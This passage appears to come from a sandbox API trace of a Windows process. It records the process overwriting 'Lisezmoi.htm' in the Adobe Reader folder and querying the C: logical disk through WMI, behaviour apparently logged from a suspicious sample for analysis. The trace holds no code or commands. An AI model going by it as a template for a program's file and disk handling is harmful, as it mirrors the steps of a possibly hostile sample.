10.0\\Lisezmoi.htm", lpFilePart=0x0) returned 0x35 [0175.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0175.293] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0175.669] GetFileType (hFile=0x320) returned 0x1 [0175.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0175.670] GetFileType (hFile=0x320) returned 0x1 [0175.670] WriteFile (in: hFile=0x320, lpBuffer=0x3693350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x3693350*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0175.671] CloseHandle (hObject=0x320) returned 1 [0175.671] CoTaskMemAlloc (cb=0x20c) returned 0xbe2e58 [0175.671] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe2e58 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0175.671] CoTaskMemFree (pv=0xbe2e58) [0175.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0175.671] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0175.671] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0175.671] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0175.671] IUnknown:Release (This=0xb51e34) returned 0x1 [0175.672] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x60275b0) returned 0x0 [0175.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x60275b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0175.672] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60275b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x60305c0) returned 0x0 [0175.672] WbemDefPath:IUnknown:Release (This=0x60275b0) returned 0x0 [0175.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x60305c0) returned 0x0 [0175.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0175.672] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0175.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0175.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0175.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbe2510) returned 0x0 [0175.672] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2510, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0175.672] WbemDefPath:IUnknown:Release (This=0xbe2510) returned 0x3 [0175.673] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0175.673] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0175.673] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0175.673] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0175.673] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0175.673] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0175.673] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0175.673] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x60305c0) returned 0x0 [0175.673] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0175.673] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0175.673] WbemDefPath:IWbemPath:SetText (This=0x60305c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetInfo (in: This=0x60305c0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetInfo (in: This=0x60305c0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetInfo (in: This=0x60305c0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0175.673] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.673] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0175.673] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0175.673] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0175.674] IUnknown:Release (This=0xb51e34) returned 0x1 [0175.674] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x60275e0) returned 0x0 [0175.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x60275e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0175.674] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60275e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030630) returned 0x0 [0175.674] WbemDefPath:IUnknown:Release (This=0x60275e0) returned 0x0 [0175.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030630) returned 0x0 [0175.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0175.675] WbemDefPath:IUnknown:AddRef (This=0x6030630) returned 0x3 [0175.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0175.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0175.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66ccad8) returned 0x0 [0175.675] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccad8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0175.675] WbemDefPath:IUnknown:Release (This=0x66ccad8) returned 0x3 [0175.675] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0175.675] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0175.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0175.675] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x2 [0175.675] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x1 [0175.675] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0175.675] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0175.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030630) returned 0x0 [0175.675] WbemDefPath:IUnknown:AddRef (This=0x6030630) returned 0x3 [0175.675] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x2 [0175.675] WbemDefPath:IWbemPath:SetText (This=0x6030630, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0175.675] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0175.675] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0175.675] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.675] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0175.675] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0175.675] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0175.675] IUnknown:Release (This=0xb51e34) returned 0x1 [0175.676] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6023d98) returned 0x0 [0175.676] WbemLocator:IUnknown:QueryInterface (in: This=0x6023d98, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0175.676] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023d98, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60275c0) returned 0x0 [0175.676] WbemLocator:IUnknown:Release (This=0x6023d98) returned 0x0 [0175.676] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60275c0) returned 0x0 [0175.676] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0175.676] WbemLocator:IUnknown:AddRef (This=0x60275c0) returned 0x3 [0175.676] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0175.676] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0175.676] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0175.677] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0175.677] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0175.677] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0175.677] WbemLocator:IUnknown:Release (This=0x60275c0) returned 0x2 [0175.677] WbemLocator:IUnknown:Release (This=0x60275c0) returned 0x1 [0175.677] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0175.677] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0175.677] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60275c0) returned 0x0 [0175.677] WbemLocator:IUnknown:AddRef (This=0x60275c0) returned 0x3 [0175.677] WbemLocator:IUnknown:Release (This=0x60275c0) returned 0x2 [0175.677] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0175.677] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0175.677] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.677] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60277b0) returned 0x0 [0175.677] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60277b0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x603305c) returned 0x0 [0177.156] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5a9b4) returned 0x0 [0177.156] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a9b4, pProxy=0x603305c, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0177.156] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x1 [0177.157] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5a9d4) returned 0x0 [0177.157] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5a9b4) returned 0x0 [0177.157] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a9b4, pProxy=0x603305c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0177.157] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x2 [0177.157] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0177.157] CoTaskMemFree (pv=0xbd4a38) [0177.157] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x0 [0177.157] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5a9d4) returned 0x0 [0177.157] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0177.158] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0177.159] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0177.159] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, 